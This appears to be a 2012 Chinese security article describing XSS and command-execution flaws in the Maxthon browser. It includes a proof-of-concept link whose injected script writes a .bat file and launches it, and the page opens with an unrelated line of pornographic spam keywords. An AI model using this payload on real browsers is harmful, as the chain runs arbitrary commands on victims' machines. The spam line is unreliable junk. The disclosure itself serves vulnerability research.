欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

傲游瀏覽器命令執(zhí)行漏洞介紹以及修復(fù)方案

  發(fā)布時間:2012-07-12 17:07:31   作者:icefish   我要評論
傲游又暴漏洞了




這個漏洞首先是國外某個團(tuán)隊發(fā)現(xiàn)的,他研究了多個瀏覽器的漏洞。其中遨游的漏洞比較獨(dú)特,大致存在幾個方面的,
1.about:history中存在xss漏洞,即瀏覽歷史中url鏈接中存在明顯的xss漏洞。
2.遨游的拓展中存在大量敏感函數(shù),其中包括了寫文件(目前看只能寫在C:\Documents and Settings\Administrator\Local Settings\Temp目錄下),命令執(zhí)行(執(zhí)行你寫入的文件),此外目測還有大量系統(tǒng)內(nèi)部數(shù)據(jù)可以操作,比如下載,配置等等。
3.除了1所說的地方外,Rss訂閱那里也有xss漏洞,我個人估計遨游自己的插件大部分地方可能都會存在xss漏洞
4.2中所提到的大量敏感函數(shù)都是在dom中,只能在域i.maxthon.com以及本地類似瀏覽歷史,收藏夾這種地方被調(diào)用。
 
構(gòu)造類似鏈接
http://www.dbjr.com.cn /1.html#\"><img src=a onerror='var b=maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k calc.exe");alert(b.name_);maxthon.program.Program.launch(b.name_,"C:\\WINDOWS\\system32")'/>
 
在遨游中訪問,
然后打開about:history,就可以看到效果了
那個pdf給的例子是構(gòu)造了1.html的內(nèi)容為
a=window.location.href='about:history';
 
修復(fù)方案:

ms遨游已經(jīng)修復(fù)了直接打開about:history這個洞 

相關(guān)文章

最新評論